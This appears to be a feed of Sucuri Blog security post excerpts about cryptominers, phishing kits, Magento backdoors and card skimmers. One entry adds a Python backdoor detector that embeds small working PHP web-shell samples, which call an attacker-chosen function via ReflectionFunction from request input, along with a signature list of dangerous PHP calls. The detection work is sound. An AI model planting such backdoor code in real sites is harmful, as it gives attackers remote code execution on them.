What is Cryptocurrency Mining Malware?


Cryptocurrency mining malware is stealthy malware that hijacks the processing resources of a system (computers, smartphones and other internet-connected devices) to generate revenue for the criminals controlling it. Instead of buying graphics card farms or other dedicated hardware, these cryptominers use other people's computers and servers for their processing power, without permission. The malware mines cryptocurrency on its targets' systems, or in some cases steals cryptocurrency from them, while consuming resources in a way the owner is unlikely to notice. Continue reading What is […]

Analysis of a Phishing Kit (that targets Chase Bank)


Most of us are already familiar with phishing: a common type of internet scam in which unsuspecting victims are tricked into entering their real login credentials on fake pages controlled by attackers. Once entered, the attackers siphon off those credentials and use them for their own purposes. Sometimes this is merely a nuisance, for example someone entering their Netflix login on a bogus page. It becomes much more serious when banking credentials are involved. Continue reading Analysis of a Phishing Kit (that targets Chase Bank) at Sucuri Blog.

How Passwords Get Hacked


Can you think of an online service that doesn’t require a password? Everything on the internet requires a password. However, constantly creating and remembering new and ever more complex passwords is no small task. In fact, 66% of people polled admitted to using the same password more than once because of how hard it is to remember passwords that are considered strong. Taking steps to make passwords easier to remember can also make them easier for hackers to guess. Continue reading How Passwords Get Hacked at Sucuri Blog.

7 Ways to Secure Magento 1


Unpatched Magento 2 installations contain plenty of vulnerabilities too, but this article focuses on Magento 1. The reason is that Magento 2 still receives regularly updated patches for the most common vulnerabilities targeting the platform, whereas the patches that exist for known Magento 1 vulnerabilities are no longer maintained: Magento 1 reached its end of support on June 30, 2020. Magento 2 was released with the goals of improving security and speed, supporting current PHP versions, adding SEO optimizations and providing a more user-friendly interface. Continue reading 7 Ways to Secure Magento […]

Adobe Patches Critical Magento Vulnerabilities in Recent Update


Adobe has recently released several critical security patches for both the open source and the commercial version of its ecommerce platform. Adobe states that 18 security vulnerabilities were patched in total, although the patch notes list only 16 specific issues. Eleven of these issues are rated critical and five important under Adobe's severity ratings. Ten of the vulnerabilities require no authentication whatsoever to exploit, whereas the remaining six require an admin account. Continue reading Adobe Patches Critical Magento Vulnerabilities in Recent Update at Sucuri Blog.

Best Practices for Web Form Security


Web form security, the set of tools and practices that protect web forms from attack and abuse, is one of the most critical aspects of overall website security. Web forms let users interact with your site and enable a lot of useful functionality. However, as soon as a user can interact with your site to do something useful, there is a new attack surface for an attacker to exploit. To help you get the usability benefits of web forms while limiting the security risk, we have compiled this list of best practices for web form security. Continue reading […]

Examining Unique Magento Backdoors


During a recent investigation into a compromised Magento ecommerce environment, we discovered five different backdoors that would give attackers code execution. The techniques used in these backdoors illustrate the ever-changing landscape of website security and highlight some of the tactics used to evade traditional backdoor detection. Reflection Functions One such backdoor was appended to the Magento core file /errors/503.php: This sample takes user input from the "ID" URL parameter and builds a ReflectionFunction from it, so the object stored in the $func variable resolves to whichever function name the attacker passed as input, without any of the usual eval() or system() calls that signature-based scanners look for. […]
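The point of the reflection backdoor is that it never contains the strings a signature list is built around. The Python scanner below is an added example (not code from the post or from Sucuri) that shows the gap: it embeds constructed PHP samples imitating the pattern described above (function name taken from the "ID" request parameter and handed to ReflectionFunction), runs a naive signature list over them, and then runs a small taint check that flags Reflection objects whose target name derives from request input. The PHP samples, the signature list and the taint rules are all assumptions made for this example, not the code recovered from the compromised site.

```python
"""Hunt for PHP backdoors that invoke attacker-chosen functions through the
Reflection API instead of eval()/system(), which simple signature lists miss."""
import re
from dataclasses import dataclass

# Constructed samples for this example. They imitate the pattern described in
# the post (function name read from the "ID" parameter) and are not the actual
# backdoor recovered from /errors/503.php.
REFLECTION_BACKDOOR = r'''<?php
// ... normal Magento 503 maintenance page above ...
if (isset($_GET['ID'])) {
    $func = new ReflectionFunction($_GET['ID']);
    echo $func->invokeArgs(array_values($_POST));
}
'''

# Same idea, with the name laundered through a variable and a string function.
INDIRECT_BACKDOOR = r'''<?php
$id = $_REQUEST['ID'];
$name = strrev($id);
$func = new ReflectionFunction($name);
echo $func->invoke($_COOKIE['arg']);
'''

# Legitimate reflection with a hard-coded target; must not be flagged.
BENIGN_REFLECTION = r'''<?php
$rf = new ReflectionFunction('str_replace');
echo $rf->getNumberOfParameters();
'''

REQUEST_SRC = r'\$_(?:GET|POST|REQUEST|COOKIE|SERVER|ENV|FILES)\b'
REFLECT_CTOR = r'new\s+Reflection(?:Function|Method)\s*\(([^)]*)\)'
VAR = r'\$[A-Za-z_]\w*'

# The kind of list a basic signature scanner carries (assumed for this example).
NAIVE_SIGNATURES = ("eval(", "system(", "shell_exec(", "passthru(",
                    "call_user_func", "create_function", "base64_decode(")


@dataclass
class Finding:
    line: int
    reason: str
    code: str


def naive_scan(src: str) -> list:
    """Pure string matching: returns the signatures present in the source."""
    return [s for s in NAIVE_SIGNATURES if s in src]


def tainted_vars(src: str) -> set:
    """Variables whose value derives, transitively, from a request superglobal.
    Only simple `$x = ...;` assignments are considered."""
    assigns = re.findall(r'(' + VAR + r')\s*=(?!=)\s*([^;]*);', src)
    tainted, changed = set(), True
    while changed:  # iterate to a fixed point so $a -> $b -> $c chains propagate
        changed = False
        for lhs, rhs in assigns:
            if lhs in tainted:
                continue
            rhs_vars = set(re.findall(VAR, rhs))
            if re.search(REQUEST_SRC, rhs) or rhs_vars & tainted:
                tainted.add(lhs)
                changed = True
    return tainted


def reflection_scan(src: str) -> list:
    """Flag Reflection objects whose target name comes from request input."""
    tainted = tainted_vars(src)
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = re.search(REFLECT_CTOR, line)
        if not m:
            continue
        arg = m.group(1)
        if re.search(REQUEST_SRC, arg):
            findings.append(Finding(no, "reflection target read directly from request", line.strip()))
        elif set(re.findall(VAR, arg)) & tainted:
            findings.append(Finding(no, "reflection target derived from request input", line.strip()))
    return findings


if __name__ == "__main__":
    for label, sample in (("direct", REFLECTION_BACKDOOR),
                          ("indirect", INDIRECT_BACKDOOR),
                          ("benign", BENIGN_REFLECTION)):
        print(label, "naive:", naive_scan(sample), "reflection:", reflection_scan(sample))
```

The naive signature list returns nothing for either backdoor, while the reflection check reports line 4 of each and stays quiet on the benign sample. In a real engagement this kind of check belongs next to core-file integrity monitoring, since /errors/503.php is a file that should never change between releases.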

Stylish Magento Card Stealer loads Without Script Tags


Recently one of our analysts, Weston H., found a very interesting credit card stealer in a Magento environment that loads malicious JavaScript without using any script tags. In this post I will go over how it was found, how to decode it and how it works. One of our clients reported that a visitor to their website was receiving a warning from their antivirus program when navigating to the checkout page: Calls were being made to a known malicious domain already blacklisted by multiple vendors for distributing malware and for involvement in carding attacks: This certainly indicated […]

Vulnerable Plugin Exploited in Spam Redirect Campaign


Some weeks ago a critical unauthenticated privilege escalation vulnerability was discovered in old, unpatched versions of the wp-user-avatar plugin. The same vulnerability also allows arbitrary file uploads, which is where we have been seeing the infections start. The plugin has over 400,000 installations, and we have seen a sustained campaign to infect sites that have it installed. In this post I will review a common infection seen as a result of this vulnerability in the wp-user-avatar plugin. Continue reading Vulnerable Plugin Exploited in Spam Redirect Campaign at Sucuri Blog.

Magecart Swiper Uses Unorthodox Concatenation


MageCart is the name given to the roughly one dozen groups of cyber criminals targeting e-commerce websites with the goal of stealing credit card numbers and selling them on the black market. They remain an ever-growing threat to website owners. We have said many times on this blog that attackers are constantly using new techniques to evade detection. In this post I will go over a case involving one such MageCart group. A Hacked Magento Website Some time ago a client of ours came to us with a heavily infected Magento e-commerce website from which credit card details were being […]